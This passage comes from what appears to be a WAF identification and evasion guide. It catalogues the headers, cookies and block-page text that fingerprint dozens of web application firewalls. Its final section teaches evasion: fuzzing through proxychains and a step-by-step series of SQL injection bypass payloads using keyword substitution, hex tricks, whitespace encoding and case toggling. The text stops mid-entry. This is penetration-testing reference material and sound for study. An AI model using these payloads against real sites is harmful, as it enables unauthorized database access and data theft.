ModSecurity CRS
|
- Detectability: Difficult
- Detection Methodology:
- Blockpage occurs on adding a separate request header
X-Scanner when set to a particular paranoa level.
|
|
NAXSI
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains
This Request Has Been Blocked By NAXSI.
- Response headers contain unusual field
X-Data-Origin with value naxsi/waf keyword.
Server header contains naxsi/waf keyword value.
- Blocked response page may contain
NAXSI blocked information error code.
|
|
Nemesida
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response page contains
Suspicious activity detected. Access to the site is blocked..
- Contains reference to email
nwaf@{site.tld}
|
|
Netcontinuum
|
- Detectability: Moderate
- Detection Methodology:
- Session cookies contain
NCI__SessionId= cookie field name.
|
|
NetScaler AppFirewall
|
- Detectability: Moderate
- Detection Methodology:
- Response headers may contain
Connection: header field name jumbled to nnCoection:
ns_af= cookie field name.
citrix_ns_id field name.
NSC_ keyword.
NS-CACHE field value.
|
|
NevisProxy
|
- Detectability: Moderate
- Detection Methodology:
- Response header cookies contain
Navajo keyword.
|
|
NewDefend
|
- Detectability: Easy
- Detection Methodology:
- Response page contains:
- Reference to
http://www.newdefend.com/feedback/misinformation/ URL.
- Reference to
/nd_block/ directory.
Server header contains NewDefend keyword.
|
|
Nexusguard
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page has reference to
speresources.nexusguard.com/wafpage/index.html URL.
|
|
NinjaFirewall
|
- Detectability: Moderate
- Detection Methodology:
- Response page title contains
NinjaFirewall: 403 Forbidden.
- Response page contains:
For security reasons, it was blocked and logged text snippet.
NinjaFirewall keyword in title.
- Returns a
403 Forbidden response upon malicious requests.
|
|
NSFocus
|
- Detectability: Easy
- Detection Methodology:
Server header contain NSFocus keyword.
|
|
NullDDoS
|
- Detectability: Easy
- Detection Methodology:
Server header contains the NullDDoS System keyword.
|
|
onMessage Shield
|
- Detectability: Easy
- Detection Methodology:
- Response headers contain header
X-Engine field with value onMessage Shield.
- Blocked response page contains:
Blackbaud K-12 conducts routine maintenance keyword.
This site is protected by an enhanced security system.
- Reference to
https://status.blackbaud.com URL.
- Reference to
https://maintenance.blackbaud.com URL.
|
|
OpenResty Lua WAF
|
- Detectability: Easy
- Detection Methodology:
Server header contains openresty/{version} keyword.
- Blocked response page contains
openresty/{version} text.
- Blocked response code returned is
406 Not Acceptable.
|
|
Palo Alto
|
- Detectability: Moderate
- Detection Methodology:
- Blocked response page contains
Virus/Spyware Download Blocked.
- Response page might contain
Palo Alto Next Generation Security Platform text snippet.
|
|
PentaWAF
|
- Detectability: Easy
- Detection Methodology:
Server header contains PentaWAF/{version} keyword.
- Blocked response page contains text
PentaWAF/{version}.
|
|
PerimeterX
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains reference to
https://www.perimeterx.com/whywasiblocked URL.
|
|
pkSecurityModule IDS
|
- Detectability: Moderate
- Detection Methodology:
- Response content may contain
pkSecurityModule: Security.Alert.
A safety critical request was discovered and blocked text snippet.
|
|
Positive Technologies Application Firewall
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response page contains
Forbidden in h1 followed by:
Request ID: in format yyyy-mm-dd-hh-mm-ss-{ref. code}
|
|
PowerCDN
|
- Detectability: Moderate
- Detection Methodology:
- Response headers may contain
Via header with content powercdn.com.
X-Cache header with content powercdn.com.
X-CDN header with content PowerCDN.
|
|
Profense
|
- Detectability: Easy
- Detection Methodology:
Set-Cookie headers contain PLBSID= cookie field name.
Server header contain Profense keyword.
|
|
Proventia (IBM)
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response page might contain to
request does not match Proventia rules text snippet.
|
|
Puhui
|
- Detectability: Easy
- Detection Methodology:
Server header contain PuhuiWAF keyword.
|
|
Qiniu CDN
|
- Detectability: Easy
- Detection Methodology:
- Response content may contain
- Response headers contain unusual header
X-Qiniu-CDN with value set to either 0 or 1.
|
|
Radware Appwall
|
- Detectability: Moderate
- Detection Methodology:
- Response page contains the following text snippet:
Unauthorized Activity Has Been Detected. and Case Number
- Blocked response page has reference to
radwarealerting@{site.tld} email.
- Blocked response page has title set to
Unauthorized Request Blocked.
- Response headers may contain
X-SL-CompState header field name.
|
|
Reblaze
|
- Detectability: Moderate
- Detection Methodology:
- Cookies in response headers contain
rbzid= header field name.
Server field value might contain Reblaze Secure Web Gateway text snippet.
- Response page contains:
Access Denied (403) in bold.
Current session has been terminated text.
For further information, do not hesitate to contact us.
|
|
Request Validation Mode
|
- Detectability: Easy
- Detection Methodology:
- A firewall found specifically on ASP.NET websites and none others.
- Response page contains either of the following text snippet:
ASP.NET has detected data in the request that is potentially dangerous.
Request Validation has detected a potentially dangerous client input value.
HttpRequestValidationException.
- Blocked response code returned is always
500 Internal Error.
|
|
RSFirewall
|
- Detectability: Easy
- Detection Methodology:
- Response page contains:
COM_RSFIREWALL_403_FORBIDDEN keyword.
COM_RSFIREWALL_EVENT keyword.
|
|
Sabre
|
- Detectability: Easy
- Detection Methodology:
- Returns status code
500 Internal Error upon malicious requests.
- Response content has:
- Contact email
dxsupport@sabre.com.
Your request has been blocked bold warning.
clicking the above email link will automatically add some important details to the email for us to investigate the problem text snippet.
|
|
Safe3
|
- Detectability: Easy
- Detection Methodology:
- Response headers contain:
X-Powered-By header has field value Safe3WAF.
Server header contains field value set to Safe3 Web Firewall.
- Response page contains
Safe3waf keyword.
|
|
SafeDog
|
- Detectability: Easy/Moderate
- Detection Methodology:
Server header in response may contain:
WAF/2.0 keyword.
safedog field value.
|
|
SecKing
|
- Detectability: Easy/Moderate
- Detection Methodology:
Server header in response may contain:
SECKINGWAF keyword.
SECKING/{version} field value.
|
|
SecuPress
|
- Detectability: Easy
- Detection Methodology:
- Response content may contain:
SecuPress as text.
Block ID: Bad URL Contents as text.
- Response code returned is
503 Service Unavailable.
|
|
Secure Entry
|
- Detectability: Easy
- Detection Methodology:
Server header contains value set to Secure Entry Server.
|
|
SecureIIS
|
- Detectability: Easy
- Detection Methodology:
- Response page contains either of the following text snippet:
- Image displaying
beyondtrust logo.
Download SecureIIS Personal Edition
- Reference to
http://www.eeye.com/SecureIIS/ URL.
SecureIIS Error text snippet.
|
|
SecureSphere
|
- Detectability: Difficult
- Detection Methodology:
- Response page contains the following text snippet:
- Error in
h2 text.
- Title contains only text as
Error.
Contact support for additional information. text.
|
|
SEnginx
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains
SENGINX-ROBOT-MITIGATION keyword.
|
|
ServerDefender VP
|
- Detectability: Easy
- Detection Methodology:
- Blocked response contains
X-Pint header field with p80 keyword.
|
|
Shadow Daemon
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response page contains
request forbidden by administrative rules. keyword.
|
|
ShieldSecurity
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response page contains:
You were blocked by the Shield. text.
Something in the URL, Form or Cookie data wasn't appropriate text snippet.
Warning: You have {number} remaining transgression(s) against this site.
Seriously stop repeating what you are doing or you will be locked out.
|
|
SiteGround
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response page contains
The page you are trying to access is restricted due to a security rule text snippet.
|
|
SiteGuard (JP Secure)
|
- Detectability: Difficult
- Detection Methodology:
- Response page contains:
Powered by SiteGuard text snippet.
The server refuse to browse the page. text snippet.
The URL may not be correct. Please confirm the value.
|
|
SiteLock TrueShield
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page source contains the following:
- Reference to
www.sitelock.com URL.
Sitelock is leader in Business Website Security Services. text.
sitelock-site-verification keyword.
sitelock_shield_logo image.
|
|
SonicWall
|
- Detectability: Easy
- Detection Methodology:
Server header contain SonicWALL keyword value.
- Blocked response page contains either of the following text snippet:
- Image displaying
Dell logo.
This request is blocked by the SonicWALL.
Web Site Blocked text snippet.
nsa_banner as keyword. :p
|
|
Sophos UTM
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains
Powered by UTM Web Protection keyword.
|
|
SquareSpace
|
- Detectability: Difficult
- Detection Methodology:
- Response code returned is
404 Not Found upon malicious requests.
- Blocked response page contains either of the following text snippet:
BRICK-50 keyword.
404 Not Found text snippet.
|
|
SquidProxy IDS
|
- Detectability: Easy
- Detection Methodology:
Server header contains field value squid/{version}.
- Blocked response page contains
Access control configuration prevents your request from being allowed at this time..
|
|
StackPath
|
- Detectability: Easy
- Detection Methodology:
- Contains image displaying
StackPath logo.
- Blocked response page contains
You performed an action that triggered the service and blocked your request.
|
|
Stingray
|
- Detectability: Difficult
- Detection Methodology:
- Blocked response code returns
403 Forbidden or 500 Internal Error.
- Response headers contain the
X-Mapping header field name.
|
|
Sucuri CloudProxy
|
- Detectability: Easy
- Detection Methodology:
- Response headers may contain
Sucuri or Cloudproxy keywords.
- Blocked response page contains the following text snippet:
Access Denied - Sucuri Website Firewall text.
- Reference to
https://sucuri.net/privacy-policy URL.
- Sometimes the email
cloudproxy@sucuri.net.
- Contains copyright notice
;copy {year} Sucuri Inc.
- Response headers contains
X-Sucuri-ID header along with normal requests.
|
|
Synology Cloud
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page has
Copyright (c) 2019 Synology Inc. All rights reserved.as text.
|
|
Tencent Cloud
|
- Detectability: Moderate
- Detection Methodology:
- Blocked response code returns
405 Method Not Allowed error.
- Blocked response page contains reference to
waf.tencent-cloud.com URL.
|
|
Teros
|
- Detectability: Difficult
- Detection Methodology:
- Response headers contain cookie field
st8id.
|
|
TrafficShield
|
- Detectability: Moderate
- Detection Methodology:
Server might contain F5-TrafficShield keyword.
ASINFO= value might be detected in response cookies.
|
|
TransIP
|
- Detectability: Easy
- Detection Methodology:
- Response headers contain unique header
X-TransIP-Backend.
- Response headers contain another header
X-TransIP-Balancer.
|
|
UCloud UEWaf
|
- Detectability: Easy
- Detection Methodology:
- Response content might contain:
- Reference to
/uewaf_deny_pages/default/img/ inurl directory.
ucloud.cn URL.
- Response headers returned has
Server header set to uewaf/{version}.
|
|
URLMaster SecurityCheck
|
- Detectability: Moderate
- Detection Methodology:
- Response headers might contain:
UrlMaster keyword.
UrlRewriteModule keyword.
SecurityCheck keyword.
- Blocked response code returned is
400 Bad Request text snippet.
|
|
URLScan
|
- Detectability: Moderate
- Detection Methodology:
- Blocked response page contains:
Rejected-by-URLScan text snippet.
Server Erro in Application as heading.
Module: IIS Web Core in table.
|
|
USP Secure Entry
|
- Detectability: Moderate
- Detection Methodology:
- Response headers contain
Secure Entry Server field value.
|
|
Varnish (OWASP)
|
- Detectability: Easy
- Detection Methodology:
- Malicious request returns
404 Not Found Error.
- Response page contains:
Request rejected by xVarnish-WAF text snippet.
|
|
Varnish CacheWall
|
- Detectability: Easy
- Detection Methodology:
- Response page contains:
Error 403 Naughty, not Nice! as heading.
Varnish cache Server as text.
|
|
Viettel
|
- Detectability: Easy
- Detection Methodology:
- Response page contains:
- Block page has title set to
Access denied · Viettel WAF.
- Reference to
https://cloudrity.com.vn/ URL.
- Response page contains keywords
Viettel WAF system.
- Contact information reference to
https://cloudrity.com.vn/customer/#/contact URL.
|
|
VirusDie
|
- Detectability: Easy
- Detection Methodology:
- Response page contains:
http://cdn.virusdie.ru/splash/firewallstop.png picture.
copy; Virusdie.ru copyright notice.
- Response page title contains
Virusdie keyword.
- Page metadata contains
name="FW_BLOCK" keyword
|
|
WallArm
|
- Detectability: Moderate
- Detection Methodology:
Server headers contain nginx-wallarm value.
|
|
WatchGuard IPS
|
- Detectability: Easy
- Detection Methodology:
Server headers may contain WatchGuard field value.
- Blocked response page contains:
Request denied by WatchGuard Firewall text.
WatchGuard Technologies Inc. as footer.
|
|
WebARX Security
|
- Detectability: Easy
- Detection Methodology:
- Restricted to specifically WordPress sites only.
- Blocked response page contains:
This request has been blocked by WebARX Web Application Firewall text.
- Reference to
/wp-content/plugins/webarx/ directory where it is installed.
|
|
WebKnight
|
- Detectability: Easy
- Detection Methodology:
- Response headers contain
WebKnight keyword.
- Blocked response page contains:
WebKnight Application Firewall Alert text warning.
AQTRONIX WebKnight text snippet.
- Blocked response code returned is
999 No Hacking. :p
- Blocked response code returned is also
404 Hack Not Found. :p
|
|
WebLand
|
- Detectability: Easy
- Detection Methodology:
Server header contains Apache Protected By WebLand WAF keyword.
|
|
WebRay
|
- Detectability: Easy
- Detection Methodology:
Server header contains WebRay-WAF keyword.
- Response headers may have
DrivedBy field with value RaySrv RayEng/{version}.
|
|
WebSEAL
|
- Detectability: Easy
- Detection Methodology:
Server header contain WebSEAL keyword.
- Blocked response page contains:
This is a WebSEAL error message template file text.
WebSEAL server received an invalid HTTP request text snippet.
|
|
WebTotem
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains
The current request was blocked by WebTotem.
|
|
West263CDN
|
- Detectability: Easy
- Detection Methodology:
- Response headers contain
X-Cache header field with WT263CDN value.
|
|
Wordfence
|
- Detectability: Easy
- Detection Methodology:
- Response headers contain
WebKnight keyword.
- Blocked response page contains:
Generated by Wordfence text snippet.
A potentially unsafe operation has been detected in your request to this site text warning.
Your access to this site has been limited text warning.
This response was generated by Wordfence text snippet.
|
|
WTS-WAF
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page title has
WTS-WAF keyword.
Server header contains wts as value.
|
|
XLabs Security WAF
|
- Detectability: Easy
- Detection Methodology:
- Response headers contain
X-CDN header field with XLabs Security value.
|
|
Xuanwudun WAF
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains reference to
http://admin.dbappwaf.cn/index.php/Admin/ClientMisinform/ site URL.
|
|
Yunaq Chuangyu
|
- Detectability: Moderate
- Detection Methodology:
- Response page has reference to:
365cyd.com or 365cyd.net URL.
- Reference to help page at
http://help.365cyd.com/cyd-error-help.html?code=403.
|
|
Yundun
|
- Detectability: Easy
- Detection Methodology:
Server header contains YUNDUN as value.
X-Cache header field contains YUNDUN as value.
- Response page contains
Blocked by YUNDUN Cloud WAF text snippet.
- Blocked response page contains reference to
yundun.com/yd_http_error/ URL.
|
|
Yunsuo
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains image class reference to
yunsuologo.
- Response headers contain the
yunsuo_session field name.
|
|
YxLink
|
- Detectability: Easy
- Detection Methodology:
- Response might have
yx_ci_session cookie field.
- Response might have
yx_language cookie field.
Server header contains Yxlink-WAF field value.
|
|
ZenEdge
|
- Detectability: Easy
- Detection Methodology:
- Blocked response page contains reference to
/__zenedge/assets/ directory.
Server header contain ZENEDGE keyword.
- Blocked response headers may contain
X-Zen-Fury header.
|
|
ZScaler
|
- Detectability: Easy
- Detection Methodology:
Server header has value set to ZScaler.
- Blocked response page contains:
Access Denied: Accenture Policy text.
- Reference to
https://policies.accenture.com URL.
- Reference to image at
https://login.zscloud.net/img_logo_new1.png.
Your organization has selected Zscaler to protect you from internet threats.
The Internet site you have attempted to access is prohibited. Accenture's webfilters indicate that the site likely contains content considered inappropriate.
|
## Evasion Techniques
Lets look at some methods of bypassing and evading WAFs.
### Fuzzing/Bruteforcing:
#### Method:
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
- Wordlists specifically for fuzzing
- [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
- [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)
- [Other Payloads](https://github.com/foospidy/payloads)
#### Technique:
- Load up your wordlist into fuzzer and start the bruteforce.
- Record/log all responses from the different payloads fuzzed.
- Use random user-agents, ranging from Chrome Desktop to iPhone browser.
- If blocking noticed, increase fuzz latency (eg. 2-4 secs).
- Always use proxychains, since chances are real that your IP gets blocked.
#### Drawbacks:
- This method often fails.
- Many a times your IP will be blocked (temporarily/permanently).
### Regex Reversing:
#### Method:
- Most efficient method of bypassing WAFs.
- Some WAFs rely upon matching the attack payloads with the signatures in their databases.
- Payload matches the reg-ex the WAF triggers alarm.
#### Techniques:
### Blacklisting Detection/Bypass
- In this method we try to fingerprint the rules step by step by observing the keywords being blacklisted.
- The idea is to guess the regex and craft the next payloads which doesn't use the blacklisted keywords.
__Case__: SQL Injection
##### • Step 1:
__Keywords Filtered__: `and`, `or`, `union`
__Probable Regex__: `preg_match('/(and|or|union)/i', $id)`
- __Blocked Attempt__: `union select user, password from users`
- __Bypassed Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
##### • Step 2:
__Keywords Filtered__: `and`, `or`, `union`, `where`
- __Blocked Attempt__: `1 || (select user from users where user_id = 1) = 'admin'`
- __Bypassed Injection__: `1 || (select user from users limit 1) = 'admin'`
##### • Step 3:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`
- __Blocked Attempt__: `1 || (select user from users limit 1) = 'admin'`
- __Bypassed Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
##### • Step 4:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`
- __Blocked Attempt__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
- __Bypassed Injection__: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1`
##### • Step 5:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`
- __Blocked Attempt__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
- __Bypassed Injection__: `1 || 1 = 1 into outfile 'result.txt'`
- __Bypassed Injection__: `1 || substr(user,1,1) = 'a'`
##### • Step 6:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`
- __Blocked Attempt__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
- __Bypassed Injection__: `1 || user_id is not null`
- __Bypassed Injection__: `1 || substr(user,1,1) = 0x61`
- __Bypassed Injection__: `1 || substr(user,1,1) = unhex(61)`
##### • Step 7:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`
- __Blocked Attempt__: `1 || substr(user,1,1) = unhex(61)`
- __Bypassed Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
##### • Step 8:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`
- __Blocked Attempt__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
- __Bypassed Injection__: `1 || lpad(user,7,1)`
##### • Step 9:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space`
- __Blocked Attempt__: `1 || lpad(user,7,1)`
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
### Obfuscation:
#### Method:
- Encoding payload to different encodings (a hit and trial approach).
- You can encode whole payload, or some parts of it and test recursively.
#### Techniques:
__1. Case Toggling__
- Some poorly developed WAFs filter selectively specific case WAFs.
- We can combine upper and lower case characters for developing efficient payloads.
__Standard__: ``
__Bypassed__: ``
__Standard__: `SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'`
__Bypassed__: `sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'`
__2. URL Encoding__
- Encode normal payloads with % encoding/URL encoding.
- Can be done with online tools like [this](https://www.url-encode-decode.com/).
- Burp includes a in-built encoder/decoder.
__Blocked__: `